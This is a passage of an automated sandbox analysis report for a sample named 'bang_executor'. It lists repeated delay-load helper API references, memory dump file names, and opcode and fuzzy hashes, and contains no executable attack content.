                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 805f58db65e6f722351a84363649c18174d99f24f023cba800dc90f7e0304a36
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 805f58db65e6f722351a84363649c18174d99f24f023cba800dc90f7e0304a36
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 6f5b7e1371d913cf3a100fb369391469f212ef7d35bed0d1f60f54e71b66879b
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 6f5b7e1371d913cf3a100fb369391469f212ef7d35bed0d1f60f54e71b66879b
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d59587ebd6cb7f7ef5f0ef8f428329f5725fa59a18c0291a6bb80cfa8962be7a
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: d59587ebd6cb7f7ef5f0ef8f428329f5725fa59a18c0291a6bb80cfa8962be7a
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f8c651974f9cece640a3776ed14fde4107b1c9269b381c666baff72135d20ddc
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: f8c651974f9cece640a3776ed14fde4107b1c9269b381c666baff72135d20ddc
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 83f3c4efb8a0bf9002fb47167bca2d018b6ed08e10d0922f99ba8d000fbcc13f
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 83f3c4efb8a0bf9002fb47167bca2d018b6ed08e10d0922f99ba8d000fbcc13f
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9e5e01941635eb71d208f79161726e57cd8fb27860cfc92167b87fe14aae170d
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 9e5e01941635eb71d208f79161726e57cd8fb27860cfc92167b87fe14aae170d
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 04ec12827753c3eee21e4b4e45274eedc4a061e0665d33672c4ddf3cd8ab341a
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 04ec12827753c3eee21e4b4e45274eedc4a061e0665d33672c4ddf3cd8ab341a
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5f8bf4fd4ceca2fc98505cd64a360d2b14761e1cc2fda2b71cd051aa3005bcf5
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 5f8bf4fd4ceca2fc98505cd64a360d2b14761e1cc2fda2b71cd051aa3005bcf5
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ec351050bba59bc500ee844cf50cf040f01b87d5434132d51c407878ba7d9e24
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: ec351050bba59bc500ee844cf50cf040f01b87d5434132d51c407878ba7d9e24
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 57ded4a6626cd4ea091dc42f7812e8aa6be2165e074ad8fbde0ee0132c90e11b
                                        • Instruction ID: 6a28e3aa580c613cee409a9d9f3ca5167269b8f816b7aa430ea5b9b8b541e7d0
                                        • Opcode Fuzzy Hash: 57ded4a6626cd4ea091dc42f7812e8aa6be2165e074ad8fbde0ee0132c90e11b
                                        • Instruction Fuzzy Hash: 74A012932541017C700821505C06D3E1A0CF9C0B10B30D83DF008C00C1544018800031
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 74ba66f596d451b3e962c69b1792bbaf72a634e5fff6f5ff0d382650d23df7c9
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 74ba66f596d451b3e962c69b1792bbaf72a634e5fff6f5ff0d382650d23df7c9
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 745bb728d4495cfad00bb242401ff7b2c10988b397b2ab61b517ae763338ee29
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 745bb728d4495cfad00bb242401ff7b2c10988b397b2ab61b517ae763338ee29
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 85fa5d7093f4face0b49fe68ae1a3d1f97c19e68c831f639a6bc5c796e90149b
                                        • Instruction ID: be2868fb19a1b1064d1f5f789511af6b4b0a0d853a1f614a73f257c65c12e5a9
                                        • Opcode Fuzzy Hash: 85fa5d7093f4face0b49fe68ae1a3d1f97c19e68c831f639a6bc5c796e90149b
                                        • Instruction Fuzzy Hash: 88A001D63AD502BCB5196295BD1BEBF0A1CF6C4B65B30AE2AF446C50C2A89128855232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f82caa80424a896cbcedc75d9a061ffd3918eecd9fd0dda19058d44cebac9fc0
                                        • Instruction ID: be2868fb19a1b1064d1f5f789511af6b4b0a0d853a1f614a73f257c65c12e5a9
                                        • Opcode Fuzzy Hash: f82caa80424a896cbcedc75d9a061ffd3918eecd9fd0dda19058d44cebac9fc0
                                        • Instruction Fuzzy Hash: 88A001D63AD502BCB5196295BD1BEBF0A1CF6C4B65B30AE2AF446C50C2A89128855232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 887e6e959bb35dd392133d3ccbd609101cd505d37fa928064214210599d238d5
                                        • Instruction ID: be2868fb19a1b1064d1f5f789511af6b4b0a0d853a1f614a73f257c65c12e5a9
                                        • Opcode Fuzzy Hash: 887e6e959bb35dd392133d3ccbd609101cd505d37fa928064214210599d238d5
                                        • Instruction Fuzzy Hash: 88A001D63AD502BCB5196295BD1BEBF0A1CF6C4B65B30AE2AF446C50C2A89128855232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 004FCBBA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
